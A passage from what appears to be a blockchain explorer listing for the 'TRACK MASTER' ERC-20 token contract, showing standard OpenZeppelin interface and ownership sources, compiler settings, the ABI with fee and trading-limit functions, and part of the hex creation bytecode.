unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol) pragma solidity ^0.8.0; import "./Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; import "./IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"wallet","type":"address"},{"internalType":"bytes32","name":"_deployer","type":"bytes32"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"BuyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"SellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"clearStuckTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"isM","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"m","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"percent","type":"uint256"}],"name":"manualswap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"setSwapTokensAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60a060405269d3c21bcecceda1000000600c5569043c33c1937564800000600d5569043c33c1937564800000600e5569021e19e0c9bab2400000600f555f60125f6101000a81548160ff0219169083151502179055505f601260016101000a81548160ff021916908315150217905550601460135560148055600f601555600f6016553480156200008e575f80fd5b5060405162006602380380620066028339818101604052810190620000b4919062001fdc565b6040518060400160405280600c81526020017f545241434b204d415354455200000000000000000000000000000000000000008152506040518060400160405280600581526020017f545241434b000000000000000000000000000000000000000000000000000000815250816003908162000131919062002285565b50806004908162000143919062002285565b505050620001666200015a62001a5c60201b60201c565b62001a6360201b60201c565b600160065f73ae2fc483527b8ef99eb5d9b44875f005ba1fae1373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7377223f67d845e3cbcd9cc19287e24e71f722888873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7377ad3a15b78101883af36ad4a875e17c86ac65d173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f734504dfa3861ec902226278c9cb7a777a0111857473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73e3df3043f1ceff4ee2705a6bd03b4a37f001029f73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73e545c3cd397be0243475af52bcff8c64e9ead5d773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73e2ca3167b89b8cf680d63b06e8aeefc5e4ebe90773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f6e05af2ddc1a93a03e9b7014064d3b8d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f731653151fb636544f8ed1e7be91e4483b73523f6b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f72ac6d844810a1bd902220b5f0006100008b000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73294401773915b1060e582756b8d7f74caf80b09c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7113de30d1b1d830dcb7d54660f4778d2d4af573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f714ec2008200e43b243a000590d4cd4636000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73e8c060f8052e07423f71d445277c61ac5138a2e573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f736b75d8af000000e20b7a7ddf000ba900b4009a8073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f71b8e312942521fb3bf278d2ef2458b0d3f24373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f727933790a4f00000099e9001629d9fe7775b80073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7376f36d497b51e48a288f03b4c1d7461e92247d5e73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f732d2a7d56773ae7d5c7b9f1b57f7be05039447b4d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73758e8229dd38cf11fa9e7c0d5f790b4ca16b3b1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7377ad3a15b78101883af36ad4a875e17c86ac65d173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f6fa991c429ee2ec6df19d40fe0c80088b873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73b20bc46930c412eae124aab8682fb0f2e528f22d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f736c9b7a1e3526e55194530a2699cf70ffde1ab5b773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f731111e3ef0b6ae32e14a55e0e7cd9b8505177c2bf73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f70d40b595b94918a28b27d1e2c66f43a51d373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73b8feffac830c45b4cd210ecdaab9d11995d338ee73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7393ffb15d1fa91e0c320d058f00ee97f9e3c5009673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7027f490acee7f11ab5fdd47209d6422c5a773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73fb62f1009ada688aa8f544b7954585476ce41a1473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73a9b2e916ec8f42a6ed59730331c83d31d0ab2d2273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73c5b25744e2339b62ca995053d53d6cdb504bbbc973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73a49fd066d0331c6dfadc13728e8a7486c82b3cd273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73d8d4fcaaed45b1015a9f333671c9076cb36f150f73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7346e459766147f2ebaf457204c61a62619da68bf473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73c41820629812ad4da5cd5a3371d53cc697d3a97873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73534bc0caa32eaeee2ec5af656b8980b2dfe0baa973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f736c29d02550aa19b34baac588723b58bb8735273273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73fd9adb71d026438296dfaae3ec5a2259ee9076b373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f734b4264b30ab75ea8b070f8f7d9abb263c2f0067b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73afed2ee8d6b57b7f3ea0af9da3a1ec0dc19d3ec473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73c8bb0336a27cae7d0c8e1030c75dc1b2bc75dfbb73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73bff42064c9f09d59abbd2416687b1607e36330d373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f733b7d3afccc66335af171a6e09c78ef32001b70f573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7372ad2f4943433ea111eb1506219820ba881f453b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f736ecda7c62d4249b895e7ee2800923b6f0424117073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7381dbfde27c3aa484568e2263a0edd6c79f3f250573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73de5540caab026b0c268720856f02fe339e25112b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f730d4ec51dd906f4643a9310f214b8604aaa3dcc4073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550738f1f73319a97877c4916f2a11262f154f66e679360075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff1681525050620016768162001b2660201b60201c565b620016b8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620016af90620023c7565b60405180910390fd5b60805173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562001704573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200172a9190620023e7565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060805173ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562001792573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620017b89190620023e7565b6040518363ffffffff1660e01b8152600401620017d792919062002428565b6020604051808303815f875af1158015620017f4573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200181a9190620023e7565b60095f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200188d60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600162001b5960201b60201c565b620018c160095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600162001bf760201b60201c565b620018d6608051600162001bf760201b60201c565b81600b5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200192982600162001bf760201b60201c565b6200193962001a5c60201b60201c565b600a5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200199a6200198c62001c5f60201b60201c565b600162001c8760201b60201c565b620019ad82600162001c8760201b60201c565b620019c030600162001c8760201b60201c565b620019d561dead600162001c8760201b60201c565b620019f7620019e962001c5f60201b60201c565b600162001bf760201b60201c565b62001a0a30600162001bf760201b60201c565b62001a1f61dead600162001bf760201b60201c565b62001a54600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600c5462001d3f60201b60201c565b505062002662565b5f33905090565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f813360405160200162001b3b9190620024a0565b60405160208183030381529060405280519060200120149050919050565b8060195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b62001c0762001ea460201b60201c565b8060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b62001c9762001ea460201b60201c565b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162001d339190620024d8565b60405180910390a25050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362001db0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162001da79062002541565b60405180910390fd5b62001dc35f838362001f3560201b60201c565b8060025f82825462001dd691906200258e565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162001e859190620025d9565b60405180910390a362001ea05f838362001f3a60201b60201c565b5050565b62001eb462001a5c60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1662001eda62001c5f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff161462001f33576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162001f2a9062002642565b60405180910390fd5b565b505050565b505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62001f6e8262001f43565b9050919050565b62001f808162001f62565b811462001f8b575f80fd5b50565b5f8151905062001f9e8162001f75565b92915050565b5f819050919050565b62001fb88162001fa4565b811462001fc3575f80fd5b50565b5f8151905062001fd68162001fad565b92915050565b5f806040838503121562001ff55762001ff462001f3f565b5b5f620020048582860162001f8e565b9250506020620020178582860162001fc6565b9150509250929050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200209d57607f821691505b602082108103620020b357620020b262002058565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620021177fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620020da565b620021238683620020da565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200216d6200216762002161846200213b565b62002144565b6200213b565b9050919050565b5f819050919050565b62002188836200214d565b620021a0620021978262002174565b848454620020e6565b825550505050565b5f90565b620021b6620021a8565b620021c38184846200217d565b505050565b5b81811015620021ea57620021de5f82620021ac565b600181019050620021c9565b5050565b601f82111562002239576200220381620020b9565b6200220e84620020cb565b810160208510156200221e578190505b620022366200222d85620020cb565b830182620021c8565b50505b505050565b5f82821c905092915050565b5f6200225b5f19846008026200223e565b1980831691505092915050565b5f6200227583836200224a565b9150826002028217905092915050565b620022908262002021565b67ffffffffffffffff811115620022ac57620022ab6200202b565b5b620022b8825462002085565b620022c5828285620021ee565b5f60209050601f831160018114620022fb575f8415620022e6578287015190505b620022f2858262002268565b86555062002361565b601f1984166200230b86620020b9565b5f5b8281101562002334578489015182556001820191506020850194506020810190506200230d565b8683101562002354578489015162002350601f8916826200224a565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f546f6b656e20697320747261646561626c6500000000000000000000000000005f82015250565b5f620023af60128362002369565b9150620023bc8262002379565b602082019050919050565b5f6020820190508181035f830152620023e081620023a1565b9050919050565b5f60208284031215620023ff57620023fe62001f3f565b5b5f6200240e8482850162001f8e565b91505092915050565b620024228162001f62565b82525050565b5f6040820190506200243d5f83018562002417565b6200244c602083018462002417565b9392505050565b5f8160601b9050919050565b5f6200246b8262002453565b9050919050565b5f6200247e826200245f565b9050919050565b6200249a620024948262001f62565b62002472565b82525050565b5f620024ad828462002485565b60148201915081905092915050565b5f8115159050919050565b620024d281620024bc565b82525050565b5f602082019050620024ed5f830184620024c7565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62002529601f8362002369565b91506200253682620024f3565b602082019050919050565b5f6020820190508181035f8301526200255a816200251b565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6200259a826200213b565b9150620025a7836200213b565b9250828201905080821115620025c257620025c162002561565b5b92915050565b620025d3816200213b565b82525050565b5f602082019050620025ee5f830184620025c8565b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6200262a60208362002369565b91506200263782620025f4565b602082019050919050565b5f6020820190508181035f8301526200265b816200261c565b9050919050565b608051613f4f620026b35f395f8181610ab701528181611082015281816110e801528181611189015281816113bb01528181611470015281816124dc015281816125bb01526125e20152613f4f5ff3fe608060405260043610610228575f3560e01c80638da5cb5b11610122578063c9567bf9116100aa578063dd8546521161006e578063dd854652146107e3578063e2f456051461080d578063f2fde38b14610837578063f8b45b051461085f578063ffb54a99146108895761022f565b8063c9567bf914610713578063ca70307514610729578063cf9522fd14610753578063d20c50d51461077d578063dd62ed3e146107a75761022f565b8063a457c2d7116100f1578063a457c2d714610621578063a9059cbb1461065d578063afa4f3b214610699578063c0246668146106c1578063c8c8ebe4146106e95761022f565b80638da5cb5b1461056957806395d89b411461059357806397682884146105bd5780639a7a23d6146105f95761022f565b806339509351116101b0578063715018a611610174578063715018a6146104d7578063751039fc146104ed5780637571336a14610503578063881dce601461052b57806389291a8f146105535761022f565b8063395